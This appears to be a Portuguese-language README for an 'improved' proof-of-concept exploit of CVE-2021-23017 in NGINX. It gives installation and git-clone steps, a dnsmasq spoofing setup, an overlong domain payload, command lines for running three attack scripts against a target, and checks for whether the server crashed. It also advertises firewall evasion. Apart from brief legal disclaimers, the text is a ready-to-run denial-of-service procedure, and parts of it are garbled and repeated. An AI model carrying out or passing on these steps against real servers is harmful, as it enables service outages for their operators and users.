
vulnerabilidade em servidores NGINX (versões 0.6.18–1.20.0). Os scripts visam causar uma Negação de Serviço (DoS) ao enviar respostas DNS maliciosas, com aprimoramentos para contornar firewalls.
vulnerabilidade em servidores NGINX (versões 0.6.18–1.20.0). Os scripts visam causar uma Negação de Serviço (DoS) enviando respostas DNS maliciosas, com melhorias para contornar firewalls. Esta é uma versão melhorada do PoC original de M507/CVE-2021-23017-PoC.
Aviso: Use apenas com permissão explícita por escrito do proprietário do sistema. Testes não autorizados são ilegais.
sudo apt-get update
sudo apt-get install python3-scapy dnsmasq
pip3 install scapy requests
git clone https://github.com/6lj/EVIL-CVE-2021-23017-Update-2025.git
cd EVIL-CVE-2021-23017-Update-2025
dnsmasq:
sudo nano /etc/dnsmasq.conf
address=/test.example.com/192.168.1.100
sudo systemctl start dnsmasq
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.test.com) para derrubar o servidor NGINX.curl e dig para explorar a vulnerabilidade.Comparado a M507/CVE-2021-23017-PoC:
poc1.2.3.py para sniffing, envio de DNS e disparo de consultas simultâneos; você deve executar os três juntos.Execute os três juntos e execute com os argumentos apropriados (substitua <target_ip>, <your_dns_server_ip>, <target_url>).
poc.pypython3 poc.py --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
poc2.pypython3 poc2.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
poc3.py (Recomendado)python3 poc3.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --target_url http://<target_url>
python3 poc3.py --target 192.168.1.100 --dns_server 192.168.1.101 --iface eth0 --target_url http://192.168.1.100
Verifique o estado do servidor:
curl -I http://<target_url>
502 Bad Gateway ou 503 Service Unavailable indica uma queda do servidor.200 OK sugere que não há vulnerabilidade ou bloqueio de firewall.Monitore o tráfego DNS:
sudo wireshark -f "udp port 53"
Aviso Legal: Apenas para fins educacionais. Os autores não são responsáveis pelo uso indevido.